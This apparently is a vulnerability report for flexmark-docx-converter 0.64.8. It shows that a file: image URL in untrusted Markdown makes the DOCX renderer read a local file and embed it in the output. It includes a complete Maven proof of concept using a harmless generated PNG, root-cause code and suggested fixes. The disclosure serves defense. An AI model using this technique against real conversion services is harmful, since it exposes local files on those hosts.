Describe the bug
flexmark-docx-converter resolves Markdown image URLs and embeds the referenced image content into the generated DOCX. A file: URL supplied in attacker-controlled Markdown is treated as a valid image source and is read from the local filesystem by the default content resolver.
This means an application that converts untrusted Markdown to DOCX can be made to read a local file from the conversion environment and embed it into the generated .docx.
Affected component:
- flexmark-docx-converter
- DocxRenderer
Affected version:
- Tested against com.vladsch.flexmark:flexmark-docx-converter:0.64.8
To Reproduce
The following is a complete Maven reproducer. It creates a local proof PNG, references that local file from Markdown using a file: URL, renders the Markdown to DOCX, then opens the generated DOCX as a ZIP archive and verifies that the proof image was embedded under word/media/.
The PoC intentionally uses a locally generated proof image instead of reading any sensitive system file.
mkdir flexmark-docx-file-image-poc
cd flexmark-docx-file-image-poc
mkdir -p src/main/java
cat > pom.xml <<'EOF'
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
  <modelVersion>4.0.0</modelVersion>
  <groupId>poc</groupId>
  <artifactId>flexmark-docx-file-image-poc</artifactId>
  <version>1.0-SNAPSHOT</version>
  <properties>
    <maven.compiler.source>11</maven.compiler.source>
    <maven.compiler.target>11</maven.compiler.target>
    <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
  </properties>
  <dependencies>
    <dependency>
      <groupId>com.vladsch.flexmark</groupId>
      <artifactId>flexmark</artifactId>
      <version>0.64.8</version>
    </dependency>
    <dependency>
      <groupId>com.vladsch.flexmark</groupId>
      <artifactId>flexmark-docx-converter</artifactId>
      <version>0.64.8</version>
    </dependency>
  </dependencies>
  <build>
    <plugins>
      <plugin>
        <groupId>org.codehaus.mojo</groupId>
        <artifactId>exec-maven-plugin</artifactId>
        <version>3.3.0</version>
        <configuration>
          <mainClass>Repro</mainClass>
        </configuration>
      </plugin>
    </plugins>
  </build>
</project>
EOF
cat > src/main/java/Repro.java <<'EOF'
import com.vladsch.flexmark.docx.converter.DocxRenderer;
import com.vladsch.flexmark.parser.Parser;
import com.vladsch.flexmark.util.ast.Node;
import com.vladsch.flexmark.util.data.MutableDataSet;
import org.docx4j.Docx4J;
import org.docx4j.openpackaging.packages.WordprocessingMLPackage;
import javax.imageio.ImageIO;
import java.awt.Color;
import java.awt.image.BufferedImage;
import java.io.File;
import java.io.InputStream;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.zip.ZipEntry;
import java.util.zip.ZipFile;
public class Repro {
    public static void main(String[] args) throws Exception {
        // Create a harmless local PNG that stands in for a file on the conversion host.
        Files.createDirectories(Path.of("target", "local-proof"));
        Path proofImage = Path.of("target", "local-proof", "flexmark-local-proof.png").toAbsolutePath();
        writeProofImage(proofImage);
        String fileUri = toFlexmarkFileUri(proofImage);
        // Markdown image whose source is the local file: URL (the alt text is arbitrary).
        String markdown = "![proof](" + fileUri + ")\n";

        // Render with default options only.
        MutableDataSet options = new MutableDataSet();
        Parser parser = Parser.builder(options).build();
        DocxRenderer renderer = DocxRenderer.builder(options).build();
        Node document = parser.parse(markdown);
        WordprocessingMLPackage template = DocxRenderer.getDefaultTemplate();
        renderer.render(document, template);
        File output = Path.of("target", "flexmark-docx-file-image-poc.docx").toFile();
        template.save(output, Docx4J.FLAG_SAVE_ZIP_FILE);

        if (!docxContainsProofImage(output)) {
            throw new IllegalStateException("The generated DOCX did not contain the local proof image");
        }
        System.out.println("Markdown input:");
        System.out.println(markdown);
        System.out.println("Generated DOCX: " + output.getAbsolutePath());
        System.out.println("FLEXMARK_DOCX_LOCAL_FILE_INCLUSION_CONFIRMED");
    }

    // Builds a file:/ URL with forward slashes on both Unix and Windows.
    private static String toFlexmarkFileUri(Path path) {
        String normalized = path.toAbsolutePath().toString().replace(File.separatorChar, '/');
        if (!normalized.startsWith("/")) {
            normalized = "/" + normalized;
        }
        return "file:" + normalized;
    }

    // Writes an 8x8 PNG with four colored quadrants: red, green, blue, yellow.
    private static void writeProofImage(Path path) throws Exception {
        BufferedImage img = new BufferedImage(8, 8, BufferedImage.TYPE_INT_RGB);
        for (int y = 0; y < 8; y++) {
            for (int x = 0; x < 8; x++) {
                int color;
                if (x < 4 && y < 4) {
                    color = Color.RED.getRGB();
                } else if (x >= 4 && y < 4) {
                    color = Color.GREEN.getRGB();
                } else if (x < 4) {
                    color = Color.BLUE.getRGB();
                } else {
                    color = Color.YELLOW.getRGB();
                }
                img.setRGB(x, y, color);
            }
        }
        ImageIO.write(img, "png", path.toFile());
    }

    // Returns true if any entry under word/media/ decodes to the proof image.
    private static boolean docxContainsProofImage(File docx) throws Exception {
        try (ZipFile zip = new ZipFile(docx)) {
            return zip.stream()
                    .filter(entry -> entry.getName().startsWith("word/media/"))
                    .anyMatch(entry -> imageEntryMatches(zip, entry));
        }
    }

    // Samples one pixel per quadrant and compares it with the expected color.
    private static boolean imageEntryMatches(ZipFile zip, ZipEntry entry) {
        try (InputStream input = zip.getInputStream(entry)) {
            BufferedImage img = ImageIO.read(input);
            if (img == null || img.getWidth() != 8 || img.getHeight() != 8) {
                return false;
            }
            return sameRgb(img.getRGB(1, 1), Color.RED)
                    && sameRgb(img.getRGB(6, 1), Color.GREEN)
                    && sameRgb(img.getRGB(1, 6), Color.BLUE)
                    && sameRgb(img.getRGB(6, 6), Color.YELLOW);
        } catch (Exception e) {
            return false;
        }
    }

    // Compares RGB channels only, ignoring alpha.
    private static boolean sameRgb(int actual, Color expected) {
        return (actual & 0x00ffffff) == (expected.getRGB() & 0x00ffffff);
    }
}
EOF
mvn -q compile exec:java
Resulting Output
The reproducer prints the attacker-controlled Markdown input and confirms that the local proof image was embedded into the generated DOCX:
Markdown input:

Generated DOCX: .../target/flexmark-docx-file-image-poc.docx
FLEXMARK_DOCX_LOCAL_FILE_INCLUSION_CONFIRMED
The generated DOCX contains the local proof image under word/media/. The reproducer verifies this by reading image entries from the DOCX ZIP archive and checking the expected pixel pattern.
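To inspect a generated DOCX by hand, the media entries can also be listed without decoding them. The following is a minimal sketch using only the JDK; the class name DocxMediaLister is hypothetical and is not part of the reproducer or of flexmark.

```java
import java.io.File;
import java.io.IOException;
import java.util.List;
import java.util.stream.Collectors;
import java.util.zip.ZipEntry;
import java.util.zip.ZipFile;

/** Hypothetical helper: lists the embedded media entries of a DOCX file. */
public final class DocxMediaLister {
    private DocxMediaLister() {}

    /** Returns the sorted names of all ZIP entries stored under word/media/. */
    public static List<String> listMedia(File docx) throws IOException {
        // A DOCX file is a ZIP archive, so the JDK ZIP API can read it directly.
        try (ZipFile zip = new ZipFile(docx)) {
            return zip.stream()
                    .map(ZipEntry::getName)
                    .filter(name -> name.startsWith("word/media/"))
                    .sorted()
                    .collect(Collectors.toList());
        }
    }
}
```

Calling DocxMediaLister.listMedia on the file produced by the reproducer should return at least one entry if the image was embedded; the exact entry names are chosen by the DOCX writer.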
Root cause
The default DocxLinkResolver treats image links as valid local content. With default options, if DOC_RELATIVE_URL and DOC_ROOT_URL are empty, it returns the original URL as LinkStatus.VALID:
if (docRelativeURL.isEmpty() && docRootURL.isEmpty()) {
    return link.withStatus(LinkStatus.VALID)
            .withUrl(url);
}
When root or relative URL options are configured, file:/ URLs are also explicitly accepted:
} else if (url.startsWith("file:/")) {
    return link.withStatus(LinkStatus.VALID)
            .withUrl(url);
}
The default FileUriContentResolver then reads valid file:/ URLs from the local filesystem:
if (resolvedLink.getStatus() == LinkStatus.VALID) {
    String url = resolvedLink.getUrl();
    if (url.startsWith("file:/")) {
        // substring holds the path portion of the URL; its derivation is omitted from this excerpt
        File includedFile = new File(substring);
        if (includedFile.isFile() && includedFile.exists()) {
            return content.withContent(FileUtil.getFileContentBytesWithExceptions(includedFile))
                    .withStatus(LinkStatus.VALID);
        }
    }
}
Finally, image rendering loads those bytes and embeds the image into the DOCX:
ResolvedContent resolvedContent = docx.resolvedContent(resolvedLink);
if (resolvedContent.getStatus() == LinkStatus.VALID) {
    image = ImageUtils.loadImageFromContent(resolvedContent.getContent(), resolvedLink.getUrl());
}
...
return newImage(docx, image, filenameHint, attributes, id1, id2, scale);
Expected behavior
file: URLs from Markdown image input should not be read and embedded by default when converting untrusted Markdown to DOCX.
Possible safe behaviors:
- reject file: image URLs by default
- require an explicit opt-in option for local file embedding
- restrict local image reads to a configured safe base directory
- reject absolute paths and path traversal outside the configured document root
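The base-directory and traversal options above could be approximated by a check like the one below. This is a minimal sketch under stated assumptions, not flexmark code: the class LocalImagePolicy and its method names are hypothetical, and it assumes the application (or a patched resolver) can inspect each image URL before any file is read.

```java
import java.io.IOException;
import java.net.URI;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Locale;

/** Hypothetical policy helper; not part of flexmark. */
public final class LocalImagePolicy {
    private LocalImagePolicy() {}

    /** True if the URL uses the file: scheme (compared case-insensitively). */
    public static boolean isFileUrl(String url) {
        return url != null && url.trim().toLowerCase(Locale.ROOT).startsWith("file:");
    }

    /**
     * True only if the file: URL points at an existing file whose real path
     * lies inside baseDir. Symlinks and ".." segments are resolved first,
     * so traversal out of the base directory is rejected.
     */
    public static boolean isInsideBase(String fileUrl, Path baseDir) {
        if (!isFileUrl(fileUrl)) {
            return false;
        }
        try {
            Path base = baseDir.toRealPath();
            Path target = Paths.get(URI.create(fileUrl.trim())).toRealPath();
            return target.startsWith(base);
        } catch (IOException | RuntimeException e) {
            // Missing file, malformed URI, or unsupported URI form: fail closed.
            return false;
        }
    }
}
```

A caller that wants the "reject by default" behavior would refuse every URL for which isFileUrl returns true, and would consult isInsideBase only after an explicit opt-in. Comparing real paths rather than raw strings is a deliberate choice here, because a string prefix check alone would accept paths such as base/../other.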
Impact
If a server-side or automated workflow converts attacker-controlled Markdown to DOCX, an attacker can cause the conversion process to read local image files and embed them into the resulting document.
The PoC uses a generated PNG for safety, but the same path reads any local file that ImageIO accepts as an image and that the conversion process can access. This may disclose local files from the conversion environment through the generated .docx.
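The "accepts as an image" limit can be illustrated with plain ImageIO. The sketch below assumes the converter's image loading behaves like a direct ImageIO.read call, which this report does not verify in detail; the class ImageDecodeCheck is a hypothetical name used only for illustration.

```java
import java.awt.image.BufferedImage;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import javax.imageio.ImageIO;

/** Hypothetical helper showing which byte sequences ImageIO will decode. */
public final class ImageDecodeCheck {
    private ImageDecodeCheck() {}

    /** True if one of the registered ImageIO readers can decode the bytes. */
    public static boolean decodesAsImage(byte[] bytes) {
        try {
            // ImageIO.read returns null when no registered reader claims the input.
            return ImageIO.read(new ByteArrayInputStream(bytes)) != null;
        } catch (IOException e) {
            return false;
        }
    }

    /** Encodes a 2x2 PNG in memory, standing in for a local image file. */
    public static byte[] tinyPng() throws IOException {
        BufferedImage img = new BufferedImage(2, 2, BufferedImage.TYPE_INT_RGB);
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        ImageIO.write(img, "png", out);
        return out.toByteArray();
    }
}
```

Under that assumption, plain text files would not be embedded through this path, while any readable file in a format ImageIO supports (for example a PNG or JPEG) could be.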
Related issue
This is separate from #676. That issue concerns XXE in XML parsing helpers; this issue concerns Markdown image URL resolution and local file reads during DOCX image rendering.